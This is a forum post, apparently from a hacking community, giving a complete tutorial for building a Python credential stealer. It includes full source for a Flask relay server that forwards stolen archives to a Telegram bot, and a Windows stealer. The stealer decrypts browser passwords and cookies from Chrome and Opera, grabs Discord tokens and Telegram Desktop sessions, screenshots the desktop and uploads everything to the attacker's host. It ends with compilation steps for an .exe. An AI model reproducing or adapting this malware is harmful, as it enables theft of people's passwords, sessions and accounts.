CreedX
Unknown
- Messages
- 233
- Reaction score
- 228
- Points
- 43
Hi all. In this article, I'll show you how to make a Python based stealer that sends to Telegram and bind it to your hosting.
Why do you need to bind it to the hosting?
The answer is simple - if you send directly to Telegram, the bot's token can be intercepted and steal your logs that way. That's why we will make our stealer first send the log to our server, and then the server will send it to us.
Preparing our Hosting
Let's buy hosting. I personally recommend this one because of its low price for hosting. We will use Ubuntu 20 as our operating system.
After purchasing, download PuTTY and enter the IP address of the hosting into it and click "Connect". In the login we write root, in the password we write the password we got in the email (example below)
The password itself will not be visible during entry, it is necessary, do not be frightened. Important! When you enter the password, do not enter Russian letters, otherwise you will not be able to erase them and you will have to re-enter everything.
Logged in. First, we need to update all of the existing packages and download other packages we need for the server.
Let's type in:
Code:
sudo apt-get update
sudo apt-get install python3
sudo apt-get install python3-pip
sudo apt-get install python3-venv
sudo apt-get install nano
sudo apt-get install screen
pip3 install Flask
pip3 install pytelegrambotapiAfter installing all the packages we need, we enter:
Code:
mkdir server
python3 -m venv server
source server/bin/activate
cd serverWith these commands we create a server folder and activate the "virtual environment" for the server in it.
Then we need to create in the server folder a file with our API for downloading files.
Type: echo > "server.py" and nano server.py. In the window that appears, insert the code:
Python:
from flask import Flask, render_template, request, jsonify
from werkzeug.utils import secure_filename
from telebot import TeleBot
TOKEN = ""
userid = 12345678
tb = TeleBot(token=TOKEN)
app = Flask(__name__)
delete_file_from_db_after_upload = False
@app.route("/uploadfile", methods=["GET", "POST"])
def upload_file():
if request.method == "POST":
print(request.files)
ft = request.files.get("file")
if ft is None:
return jsonify(error="your request has no files")
filename = f"uploaded/{secure_filename(ft.filename)}"
ft.save(filename)
with open(filename, "rb") as f:
tb.send_document(userid, f, timeout=10)
f.close()
if delete_file_from_db_after_upload:
os.remove(filename)
return "1"
else:
return jsonify(error="POST request is required")In the code itself in the line TOKEN = " " in quotes insert the token of your Telegram bot, and in the line userid = 12345678 instead of 12345678 insert the user id of your account in Telegram. Also, if you want the files to be deleted from the server's memory after they are sent to telegram, in the delete_file_from_db_after_upload = False line insert True instead of False.
Press CTRL+X to close the file and you will be offered to save it.
After creating the file, type in the commands:
Code:
screen -S server
export FLASK_APP=server.py
export FLASK_ENV=development
export FLASK_RUN_PORT=8000
export FLASK_RUN_HOST=0.0.0.0
flask runCreating a Stealer
At this point we move away from the server and work with the pc.
Download the latest Python 3 and Nuitka (we need it to compile into an .exe file).
We go into cmd and write:
Code:
python -m pip install pypiwin32
python -m pip install pycrypto
python -m pip install Pillow
Python:
import sqlite3
import shutil
import os
import win32crypt
import json
from base64 import b64decode
from Crypto.Cipher import AES
import re
import platform
import requests
from PIL import ImageGrab
import random
import psutil
from distutils.dir_util import copy_tree
serverip = ""
serverlink = f"http://{serverip}:8000/uploadfile"
def get_masterkey(path):
with open(path, "r") as f:
masterkey = b64decode(json.loads(f.read())["os_crypt"]["encrypted_key"])[5:]
f.close()
return win32crypt.CryptUnprotectData(masterkey, None, None, None, 0)[1]
def screenshot():
ss = ImageGrab.grab()
ss.save("Скриншот.jpg")
def ip_and_location():
r = requests.get("http://ip-api.com/json").json()
return "IP: {}\nСтрана: {}\nГород: {}\nКоординаты: {}, {}".format(r["query"], r["country"], r["city"], r["lat"], r["lon"])
def specs():
uname = platform.uname()
geninfo = f"Операционная система: {uname.system} {uname.release}\n"
geninfo += f"Имя пк: {uname.node}\n"
geninfo += f"Процессор: {uname.processor}\n"
return geninfo
def processes():
proclist = ""
for proc in psutil.process_iter():
proc.dict = proc.as_dict(["username", "name"])
if proc.dict.get("username") is None:
continue
if os.getlogin() in proc.dict.get("username"):
proclist += proc.dict.get("name") + "\n"
with open("Диспетчер задач.txt", "w") as f:
f.write(proclist)
f.close()
def get_info():
with open("Основная информация.txt", "w") as f:
f.write(specs() + ip_and_location())
f.close()
processes()
screenshot()
def cdupper():
os.chdir(os.path.split(os.getcwd())[0])
def cookies_decrypt(cpath, keypath):
cookdata = ""
dbname = os.path.split(cpath)[1]+".db"
shutil.copy(cpath, dbname)
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute("SELECT host_key, name, value, path, expires_utc, is_secure, is_httponly, encrypted_value FROM cookies")
for host_key, name, value, path, expires_utc, is_secure, is_httponly, encrypted_value in c.fetchall():
try:
decrypted_value = win32crypt.CryptUnprotectData(encrypted_value, None, None, None, 0)[1].decode("utf-8") or value or 0
except:
decrypted_value = AES.new(get_masterkey(keypath), AES.MODE_GCM, nonce=encrypted_value[3:3+12]).decrypt_and_verify(encrypted_value[3+12:-16], encrypted_value[-16:])
cookdata += str(host_key) + "\t" + str(is_httponly) + "\t/\t" + str(is_secure) + "\t" + str(expires_utc) + "\t" + str(name) + "\t" + str(decrypted_value.decode()) + "\n"
conn.close()
os.remove(dbname)
return cookdata
def passwords_decrypt(cpath, keypath):
passdata = b""
dbname = os.path.split(cpath)[1]+".db"
shutil.copy(cpath, dbname)
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute("SELECT action_url, username_value, password_value FROM logins")
for action_url, username_value, password_value in c.fetchall():
action_url = action_url.encode("utf-8")
username_value = username_value.encode("utf-8")
try:
decrypted_value = win32crypt.CryptUnprotectData(password_value, None, None, None, 0)[1].decode("utf-8")
except:
iv = password_value[3:15]
payload = password_value[15:]
cipher = AES.new(get_masterkey(keypath), AES.MODE_GCM, iv)
decrypted_value = str(cipher.decrypt(payload)[:-16], "utf-8", "ignore")
passdata += b"URL: " + action_url + b"\nUsername: " + username_value + b"\nPassword: " + decrypted_value.encode() + b"\n\n"
conn.close()
os.remove(dbname)
return passdata
def chrome_cookies():
keypath = os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Local State"
dbpath = [os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default\\Cookies", os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default\\Cookies2"]
if not os.path.isfile(keypath):
return
if os.path.isfile(dbpath[0]):
cookdata = cookies_decrypt(dbpath[0], keypath)
with open("Куки (Chrome).txt", "w") as f:
f.write(cookdata)
f.close()
if os.path.isfile(dbpath[1]):
cookdata = cookies_decrypt(dbpath[1], keypath)
with open("Куки (Chrome) #2.txt", "w") as f:
f.write(cookdata)
f.close()
def chrome_passwords():
keypath = os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Local State"
dbpath = [os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default\\Login Data", os.getenv("LOCALAPPDATA") + "\\Google\\Chrome\\User Data\\Default\\Login Data2"]
if not os.path.isfile(keypath):
return
if os.path.isfile(dbpath[0]):
passdata = passwords_decrypt(dbpath[0], keypath)
with open("Пароли (Chrome).txt", "wb") as f:
f.write(passdata)
f.close()
if os.path.isfile(dbpath[1]):
passdata = passwords_decrypt(dbpath[1], keypath)
with open("Пароли (Chrome) #2.txt", "wb") as f:
f.write(passdata)
f.close()
def opera_cookies():
keypath = os.getenv("APPDATA") + "\\Opera Software\\Opera Stable\\Local State"
dbpath = [os.getenv("APPDATA") + "\\Opera Software\\Opera Stable\\Cookies", os.getenv("LOCALAPPDATA") + "\\Opera Software\\Opera Stable\\Cookies2"]
if not os.path.isfile(keypath):
return
if os.path.isfile(dbpath[0]):
cookdata = cookies_decrypt(dbpath[0], keypath)
with open("Куки (Opera).txt", "w") as f:
f.write(cookdata)
f.close()
if os.path.isfile(dbpath[1]):
cookdata = cookies_decrypt(dbpath[1], keypath)
with open("Куки (Opera) #2.txt", "w") as f:
f.write(cookdata)
f.close()
def opera_passwords():
keypath = os.getenv("APPDATA") + "\\Opera Software\\Opera Stable\\Local State"
dbpath = [os.getenv("APPDATA") + "\\Opera Software\\Opera Stable\\Login Data", os.getenv("APPDATA") + "\\Opera Software\\Opera Stable\\Login Data2"]
if not os.path.isfile(keypath):
return
if os.path.isfile(dbpath[0]):
passdata = passwords_decrypt(dbpath[0], keypath)
with open("Пароли (Opera).txt", "wb") as f:
f.write(passdata)
f.close()
if os.path.isfile(dbpath[1]):
passdata = passwords_decrypt(dbpath[1], keypath)
with open("Пароли (Opera) #2.txt", "wb") as f:
f.write(passdata)
f.close()
def operagx_cookies():
keypath = os.getenv("APPDATA") + "\\Opera Software\\Opera GX Stable\\Local State"
dbpath = [os.getenv("APPDATA") + "\\Opera Software\\Opera GX Stable\\Cookies", os.getenv("LOCALAPPDATA") + "\\Opera Software\\Opera GX Stable\\Cookies2"]
if not os.path.isfile(keypath):
return
if os.path.isfile(dbpath[0]):
cookdata = cookies_decrypt(dbpath[0], keypath)
with open("Куки (Opera GX).txt", "w") as f:
f.write(cookdata)
f.close()
if os.path.isfile(dbpath[1]):
cookdata = cookies_decrypt(dbpath[1], keypath)
with open("Куки (Opera GX) #2.txt", "w") as f:
f.write(cookdata)
f.close()
def operagx_passwords():
keypath = os.getenv("APPDATA") + "\\Opera Software\\Opera GX Stable\\Local State"
dbpath = [os.getenv("APPDATA") + "\\Opera Software\\Opera GX Stable\\Login Data", os.getenv("APPDATA") + "\\Opera Software\\Opera GX Stable\\Login Data2"]
if not os.path.isfile(keypath):
return
if os.path.isfile(dbpath[0]):
passdata = passwords_decrypt(dbpath[0], keypath)
with open("Пароли (Opera GX).txt", "wb") as f:
f.write(passdata)
f.close()
if os.path.isfile(dbpath[1]):
passdata = passwords_decrypt(dbpath[1], keypath)
with open("Пароли (Opera GX) #2.txt", "wb") as f:
f.write(passdata)
f.close()
def find_token(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
def discord_token():
rad = os.getenv("APPDATA")
lad = os.getenv("LOCALAPPDATA")
dcpaths = [rad + "\\discord", rad + "\\discordcanary", rad + "\\discordptb", lad + "\\Google\\Chrome\\User Data\\Default"]
for dcpath in dcpaths:
if not os.path.exists(dcpath):
dcpaths.remove(dcpath)
if dcpaths != []:
tokenslist = find_token(dcpaths[0])
tokens = "\n".join(tokenslist)
else:
tokens = "Discord не установлен!"
with open("Discord Токены.txt", "w") as f:
f.write(tokens)
f.close()
def telegram_ssfn():
diskletters = ["A", "B", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"]
pcdisks = ["C"]
for i in diskletters:
if os.path.exists(i + ":\\"):
pcdisks.append(i + ":\\")
tgpath = ""
for i in pcdisks:
for root, dirs, files in os.walk(i):
if "Telegram.exe" in files:
tgpath = root
break
if tgpath != "":
filelist = os.listdir(tgpath+"\\tdata")
for i in filelist:
if i == "D877F783D5D3EF8C":
copy_tree(tgpath+"\\tdata\\"+i, i)
break
if __name__ == "__main__":
os.chdir(os.getenv("TMP"))
r = requests.get("http://ip-api.com/json").json()
filename = "{}_{}".format(r["countryCode"], r["query"])
os.mkdir(filename)
os.chdir(filename)
os.mkdir("Браузеры")
os.chdir("Браузеры")
chrome_passwords()
chrome_cookies()
opera_passwords()
opera_cookies()
operagx_passwords()
operagx_cookies()
cdupper()
os.mkdir("Другое")
os.chdir("Другое")
discord_token()
telegram_ssfn()
cdupper()
get_info()
cdupper()
shutil.make_archive(filename, "zip", filename)
shutil.rmtree(filename)
with open(f"{filename}.zip", "rb") as f:
req = requests.post(serverlink, files={"file": f}).text
print(req)
f.close()
os.remove(f"{filename}.zip")In the line serverip = "" in quotes enter the IP address of your server.
In brief, what it can do:
Stealing passwords and cookies from Chrome (version 80+ supported), Opera and Opera GX browsers
Stealing discord tokens
Stealing session folder from Telegram Desktop
Close file and enter into cmd:
Code:
cd Desktop
nuitka --standalone --output-dir=deploy-nui --onefile --windows-product-version=1.0.0 --windows-company-name=qwerty *путь до вашего файла*Wait for everything to compile, after compilation, go to the deploy-nui folder on your desktop and see your styler's .exe file there. Congratulations! Now you have your own steeler, which uploads logs to you to Telegram without the risk of interception of logs!
If you don't want to pass through this you can also buy a stealer from verified seller.
Last edited:
